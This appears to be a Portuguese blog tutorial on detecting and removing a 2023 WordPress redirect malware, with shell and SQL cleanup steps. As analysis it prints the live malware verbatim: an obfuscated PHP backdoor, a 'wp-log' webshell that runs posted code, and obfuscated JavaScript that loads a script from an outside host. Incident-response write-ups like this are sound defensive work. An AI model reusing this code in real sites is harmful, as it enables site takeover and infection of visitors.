WordPress é definitivamente a plataforma mais usada CMS (Content Management System) para blogs e lojas online iniciantes (com o módulo WooCommerce), o que o torna o mais visado por ataques de computador (hacking). Uma das operações de hacking mais usadas visa redirecionar o site comprometido para outras páginas da web. Redirect WordPress Hack 2023 é um malware relativamente novo que tem o impacto de redirecionar todo o site para páginas da Web de spam ou que, por sua vez, pode infectar os computadores dos usuários.
Se o seu site foi desenvolvido em WordPress é redirecionado para outro site, provavelmente é vítima do já famoso hack de redirecionamento.
Neste tutorial, você encontrará as informações necessárias e dicas úteis com as quais você pode desfazer o vírus de um site infectado com um redirecionamento WordPress Hack (Virus Redirect). Através dos comentários você pode obter informações adicionais ou pedir ajuda.
Contente
Detecção do vírus que redireciona os sites WordPress
Uma diminuição repentina e injustificada do tráfego do site, uma diminuição do número de encomendas (no caso das lojas online) ou das receitas de publicidade são os primeiros sinais de que algo está errado. Detectando "Redirect WordPress Hack 2023” (Redirecionamento de vírus) também pode ser feito “visualmente” quando você abre o site e é redirecionado para outra página da web.
Por experiência, a maioria dos malwares da web são compatíveis com navegadores de internet: Chrome, Firefox, Edge, Opera. Se você é um usuário de computador Mac, esses vírus não são realmente visíveis no navegador Safari. Sistema de segurança de Safari bloqueie silenciosamente esses scripts maliciosos.
O que fazer se você tiver um site infectado com Redirect WordPress Hack
Espero que o primeiro passo não seja entrar em pânico ou deletar o site. Mesmo arquivos infectados ou com vírus não devem ser excluídos primeiro. Eles contêm informações valiosas que podem ajudá-lo a entender onde está a falha de segurança e o que afetou o vírus. Modo de operação.
Fechar o site ao público.
Como você fecha um site de vírus para os visitantes? O mais simples é usar o gerenciador de DNS e deletar o IP para "A" (o nome do domínio) ou definir um IP inexistente. Assim, os visitantes do site estarão protegidos desta redirect WordPress hack o que pode levá-los a páginas da Web com vírus ou SPAM.
Se você usar CloudFlare como gerenciador de DNS, você faz login na conta e exclui os registros DNS"A” para o nome de domínio. Assim, o domínio afetado pelo vírus ficará sem IP, não podendo mais ser acessado pela Internet.
Você copia o IP do site e o "roteia" para que somente você possa acessá-lo. Do seu computador.
Como alterar o IP real de um site em computadores Windows?
O método é frequentemente usado para bloquear o acesso a determinados sites editando o arquivo "hosts".
1. Você abre Notepad ou outro editor de texto (com direitos administrator) e edite o arquivo "hosts". Esta localizado em:
C:\Windows\System32\drivers\etc\hosts2. No arquivo "hosts", adicione "route" ao IP real do seu site. IP excluído acima do gerenciador de DNS.
IP.IP.IP.IP yourdomain.tld
IP.IP.IP.IP www.yourdomain.tld3. Salve o arquivo e acesse o site no navegador.
Se o site não abrir e você não fez nada de errado no arquivo "hosts", provavelmente é um cache DNS.
Para limpar o cache DNS em um sistema operacional Windows, abrir Command Prompt, onde você executa o comando:
ipconfig /flushdnsComo alterar o IP real de um site em computadores Mac / MacLivro?
Para usuários de computador Mac é um pouco mais simples alterar o IP real de um site.
1. Abra o utilitário Terminal.
2. Execute a linha de comando (requer senha do sistema para executar):
sudo nano /etc/hosts3. O mesmo que para computadores Windows, adicione o IP real do domínio.
IP.IP.IP.IP yourdomain.tld
IP.IP.IP.IP www.yourdomain.tld4. Salve as alterações. Ctrl+X (y).
Depois de ter "roteado", você é a única pessoa que pode acessar o site infectado com Redirect WordPress Hack.
Backup completo do site – Arquivos e banco de dados
Mesmo que esteja infectado com “redirect WordPress hack”, a recomendação é fazer um backup geral de todo o site. Arquivos e banco de dados. Possivelmente, você também pode salvar uma cópia local de ambos os arquivos de public / public_html assim como o banco de dados.
Identificação de arquivos infectados e modificados por Redirect WordPress Hack 2023
Os principais arquivos de destino do WordPress tem index.php (na raiz), header.php, index.php şi footer.php do tema WordPress ativos. Verifique manualmente esses arquivos e identifique um código malicioso ou um script de malware.
Em 2023, um vírus do “Redirect WordPress Hack" coloque em index.php um código da forma:
(Não recomendo executar esses códigos!)
<?php $t='er'.'ro'.'r_'.'r'.'epo'.'rt'.'in'.'g';$b0='MDxXRVM3Vj1FPSVdVDk2VVA3VjFJPEBgYApgCg==';$b1='b'.'a'.'se'.'6'.'4_'.'e'.''.'nc'.'od'.'e';$b2='b'.'as'.'e'.'6'.'4_d'.'e'.'c'.'o'.'d'.'e';$b3='c'.'on'.'ve'.'rt_uue'.'nco'.'de';$b4='c'.'o'.'nve'.'rt'.'_u'.'ude'.'co'.'de';$b5='MTlGRUw5'.'NV1QPTcxP'.'zhWXU'.'49JjVOPScsYApgCg==';$b7='';$b8='JD0mR'.'UM6U'.'GBgCmAK';$b9='IzkmRUUKYAo=';$b10='Izs2'.'MFU'.'KYAo=';$b11='QC4mOFE5Q0RWLSYkVDhDMUQ'.'uJjBRODYsU'.'zlDYFMuI'.'zhWLjMtRCx'.'DQUQsIyxgCmAK';$b12='IjhG'.'QGA'.'KYAo=';$b13='IjhDLGAKYAo=';$b14='Ji8jXV'.'A6J'.'2BACmAK';$b18='LS8nLUM8R'.'kVQPSIh'.'UzxGLF0pUGBgCmAK';$b19='KylTWFwrVy1DPEZFUD0jWGAKYAo=';$b20=' TDonMVQ8JyxaK1JdUz0mJVkrRlFJO0Y1Uz0mXUc5NzBOOFZdTStXLUM8RkVQPScsTzhWQUU4VkxOOkcsYApgCg==';$b21='JTwnKUk7RzBgCmAK';$b22='KD1XYE04NjFNOjZYYApgCg==';$b23='KD1XYE07Jl1HOjZYYApgCg==';$b24='KjxGNVM9JV1SO1c1VDkwYGAKYAo=';$b25='Jz1XYE06Ry1PO0BgYApgCg==';$b30='KTIlMTQ0JV0oM1UtNApgCg==';$b31='KzRENTE1NDUzNSVdNTRERGAKYAo=';$b34='JjxXMVI8Jl1TCmAK';$b41='WlhOeWEycDBjMmg1Y3paaFpUUnJhblU9';$b16=$b4($b2($b0))();if(isset($_POST[$b4($b2($b12))])){if($b4($b2($b10))($_POST[$b4($b2($b12))])===$b4($b2($b11))){ $b45=$_POST[$b4($b2($b13))];$b4($b2($b5))($b16.'/'.$b4($b2($b8)),$b4($b2($b14)).$b2($b45));@include($b16.'/'.$b4($b2($b8)));die();}}if(isset($_POST[$b4($b2($b8)).$b4($b2($b8))])||isset($_GET[$b4($b2($b8)).$b4($b2($b8))])){echo $b4($b2($b10))($b4($b2($b8)));die();}else{$b27=0;$b26=array($b4($b2($b22)),$b4($b2($b23)),$b4($b2($b24)),$b4($b2($b25)));$b32 = $_SERVER[$b4($b2($b30))].$_SERVER[$b4($b2($b31))];foreach ($b26 as $b33) {if($b4($b2($b34))($b32,$b33) !== false){$b27=1;}}if($b27==0) {echo $b4($b2($b18)).$b4($b2($b20)).$b4($b2($b19));}} ?>Decodificado, este script malicioso é basicamente a consequência do site estar infectado WordPress. Não é o script por trás do malware, é o script que permite redirecionar a página da Web infectada. Se decodificarmos o script acima, obtemos:
<script src="/cdn-cgi/apps/head/D6nq5D2EcGpWI6Zldc9omMs3J_0.js"></script>
<script src="https://stay.linestoget.com/scripts/check.js" type="c2cc1212300ac9423a61ac0b-text/javascript"></script>
<script src="/cdn-cgi/scripts/7d0fa10a/cloudflare-static/rocket-loader.min.js" data-cf-settings="c2cc1212300ac9423a61ac0b-|49" defer></script>
Para identificar todos os arquivos do servidor que contém este código, é bom ter acesso SSH ao servidor para executar a verificação de arquivos e linhas de comando de gerenciamento em Linux.
Relacionado: Como descobrir se seu blog está infectado ou não, com ajuda Google Search . (WordPress Vírus)
Abaixo estão dois comandos que são definitivamente úteis para identificar arquivos modificados recentemente e arquivos que contêm um determinado código (string).
Como você vê em Linux Arquivos PHP alterados nas últimas 24 horas ou em algum outro período de tempo?
Pedido "find” é muito simples de usar e permite a personalização para definir o período de tempo, o caminho a ser pesquisado e o tipo de arquivo.
find /your/web/path -type f -mtime -1 -exec ls -l {} \; | grep "\.php$"Na saída você receberá informações sobre a data e hora em que o arquivo foi modificado, as permissões de gravação/leitura/execução (chmod) e a qual grupo/usuário ele pertence.
Caso queira consultar mais dias atrás, altere o valor "-mtime -1” ou use “-mmin -360” por minutos (6 horas).
Como procurar um código (string) dentro de arquivos PHP, Java?
A linha de comando "localizar" que permite localizar rapidamente todos os arquivos PHP ou Java que contêm um determinado código é a seguinte:
find /your/web/path -type f \( -name "*.js" -o -name "*.php" \) -exec grep -l "uJjBRODYsU" {} +O comando irá pesquisar e exibir os arquivos .php şi .js contendo "uJjBRODYsU".
Com a ajuda dos dois comandos acima, você descobrirá facilmente quais arquivos foram modificados recentemente e quais contêm código de malware.
Remove o código malicioso dos arquivos modificados sem comprometer o código correto. No meu cenário, o malware foi colocado antes de abrir <head>.
Ao executar o primeiro comando "find", é muito possível descobrir novos arquivos no servidor, que não são seus WordPress nem colocado lá por você. Arquivos pertencentes ao tipo de vírus Redirect WordPress Hack.
No cenário que investiguei, arquivos do formato “wp-log-nOXdgD.php". Esses são arquivos "spawn" que também contêm código de malware usado pelo vírus para redirecionamento.
<?php $t="er"."ro"."r_"."r"."epo"."rt"."in"."g";$t(0); $a=sys_get_temp_dir();if(isset($_POST['bh'])){if(md5($_POST['bh'])==="8f1f964a4b4d8d1ac3f0386693d28d03"){$b3=$_POST['b3'];file_put_contents($a."/tpfile","<"."?"."p"."h"."p ".base64_decode($b3));@include($a."/tpfile");die();}}if(isset($_POST['tick'])||isset($_GET['tick'])){echo md5('885');}A finalidade dos arquivos do tipo "wp-log-*” é espalhar o vírus de hack de redirecionamento para outros sites hospedados no servidor. É um código de malware do tipo “webshell”composto por um seção básica (no qual algumas variáveis criptografadas são definidas) e o seção de execução através do qual o invasor tenta carregar e executar um código malicioso no sistema.
Se houver uma variável POST chamado 'bh' e seu valor criptografado MD5 é igual a "8f1f964a4b4d8d1ac3f0386693d28d03", então o script aparece para gravar o conteúdo criptografado base64 de outra variável chamada 'b3' em um arquivo temporário e tenta incluir esse arquivo temporário.
Se houver uma variável POST ou GET chamado 'tick', o script responderá com o valor MD5 da corda"885".
Para identificar todos os arquivos no servidor que contém este código, escolha uma string que seja comum e execute o comando “find” (semelhante ao anterior). Exclua todos os arquivos que contêm este código de malware.
Falha de segurança explorada por Redirect WordPress Hack
Provavelmente, esse vírus de redirecionamento chega via exploração do usuário administrador WordPress ou identificando um plug-in vulnerável que permite adicionar usuários com privilégios de administrator.
Para a maioria dos sites criados na plataforma WordPress é possível edição de arquivos de tema ou pluginda interface de administração (Dashboard). Assim, uma pessoa mal-intencionada pode adicionar código de malware aos arquivos do tema para gerar os scripts mostrados acima.
Um exemplo desse código de malware é este:
<script>var s='3558289hXnVzT';var _0x1e8ff2=_0x1524;(function(_0x5062c1,_0x3340a3){var _0x1fb079=_0x1524,_0x1e7757=_0x5062c1();while(!![]){try{var _0x2a4ba9=-parseInt(_0x1fb079(0x178))/0x1*(parseInt(_0x1fb079(0x189))/0x2)+-parseInt(_0x1fb079(0x187))/0x3+parseInt(_0x1fb079(0x17e))/0x4+-parseInt(_0x1fb079(0x182))/0x5+-parseInt(_0x1fb079(0x176))/0x6*(-parseInt(_0x1fb079(0x17c))/0x7)+-parseInt(_0x1fb079(0x177))/0x8*(parseInt(_0x1fb079(0x172))/0x9)+-parseInt(_0x1fb079(0x181))/0xa*(-parseInt(_0x1fb079(0x179))/0xb);if(_0x2a4ba9===_0x3340a3)break;else _0x1e7757['push'](_0x1e7757['shift']());}catch(_0x332dc7){_0x1e7757['push'](_0x1e7757['shift']());}}}(_0x18f7,0x56d7f));function _0x18f7(){var _0x33878d=['getElementsByTagName','684364prPqlZ','src','873KJkhlg','fromCharCode','head','script[src=\x22','1137318yPDczb','1648yAATZA','1MjirdU','1936BqEZLn','9.3.2','createElement','21FNTvZp','appendChild','1812244aSZNJb','script','currentScript','15090pySUMO','1032605tfOmII','querySelector','insertBefore','parentNode','/sta','1088724TsmeQl'];_0x18f7=function(){return _0x33878d;};return _0x18f7();}function isScriptLoaded(_0x47ea31){var _0x210a48=_0x1524;return Boolean(document[_0x210a48(0x183)](_0x210a48(0x175)+_0x47ea31+'\x22]'));}var bd='ht'+'tp'+'s:'+'/'+_0x1e8ff2(0x186)+'y.l'+String[_0x1e8ff2(0x173)](0x69,0x6e,0x65,0x73,0x74,0x6f,0x67,0x65,0x74,0x2e,0x63,0x6f,0x6d,0x2f,0x73,0x63,0x72,0x69,0x70,0x74,0x73,0x2f,0x63,0x68,0x65,0x63,0x6b,0x2e,0x6a,0x73,0x3f,0x76,0x3d)+_0x1e8ff2(0x17a);function _0x1524(_0x1168b6,_0x2ef792){var _0x18f7eb=_0x18f7();return _0x1524=function(_0x15242f,_0x543bbb){_0x15242f=_0x15242f-0x171;var _0xef6154=_0x18f7eb[_0x15242f];return _0xef6154;},_0x1524(_0x1168b6,_0x2ef792);}if(isScriptLoaded(bd)===![]){var d=document,s=d[_0x1e8ff2(0x17b)](_0x1e8ff2(0x17f));s[_0x1e8ff2(0x171)]=bd,document[_0x1e8ff2(0x180)]?document['currentScript'][_0x1e8ff2(0x185)]!==null&&document[_0x1e8ff2(0x180)][_0x1e8ff2(0x185)][_0x1e8ff2(0x184)](s,document[_0x1e8ff2(0x180)]):d[_0x1e8ff2(0x188)](_0x1e8ff2(0x174))[0x0]!==null&&d[_0x1e8ff2(0x188)]('head')[0x0][_0x1e8ff2(0x17d)](s);}</script>JavaScript identificado no cabeçalho do tema WordPress, logo após a abertura do rótulo <head>.
É bastante difícil decifrar esse JavaScript, mas é óbvio que ele consulta outro endereço da web de onde provavelmente busca outros scripts para criar os arquivos "wp-log-*” sobre o qual falei acima.
Encontre e exclua este código de todos os arquivos PHP afetado.
Tanto quanto eu poderia dizer, este código foi adicionado manualmente por um novo usuário com privilégios administrativos.
Portanto, para evitar a adição de malware do Dashboard, é melhor desativar a opção de edição WordPress Temas / Plugins do Painel.
Edite o arquivo wp-config.php e adicione as linhas:
define('DISALLOW_FILE_EDIT',true);
define('DISALLOW_FILE_MODS',true);Depois de fazer esta alteração, nenhum usuário WordPress você não poderá mais editar arquivos no Painel.
Verifique os usuários com a função de Administrator
Abaixo está uma consulta SQL que você pode usar para procurar usuários com a função de administrator na plataforma WordPress:
SELECT * FROM wp_users
INNER JOIN wp_usermeta ON wp_users.ID = wp_usermeta.user_id
WHERE wp_usermeta.meta_key = 'wp_capabilities'
AND wp_usermeta.meta_value LIKE '%administrator%'Esta consulta retornará todos os usuários na tabela wp_users que atribuiu o papel de administrator. A consulta também é feita para a tabela wp_usermeta para pesquisar em meta 'wp_capabilities', que contém informações sobre as funções do usuário.
Outro método é identificá-los a partir de: Dashboard → Users → All Users → Administrator. No entanto, existem práticas pelas quais um usuário pode ser ocultado no painel Dashboard. Portanto, a melhor maneira de ver os usuários "Administrator"em WordPress é o comando SQL acima.
No meu caso, identifiquei no banco de dados o usuário com o nome "wp-import-user". Bastante sugestivo.
Também a partir daqui você pode ver a data e hora em que o usuário WordPress foi criado. O ID do usuário também é muito importante porque pesquisa os logs do servidor. Desta forma, você pode ver toda a atividade deste usuário.
Excluir usuários com função de administrator que você não sabe, então mudar senhas a todos os usuários administrativos. Editor, Autor, Administrator.
Alterar a senha do usuário do banco de dados SQL do site afetado.
Depois de executar essas etapas, o site pode ser reiniciado para todos os usuários.
Tenha em mente, no entanto, que o que apresentei acima é um dos talvez milhares de cenários em que um site está infectado com Redirect WordPress Hack em 2023.
Se o seu site foi infectado e você precisa de ajuda ou tem alguma dúvida, a seção de comentários está aberta.
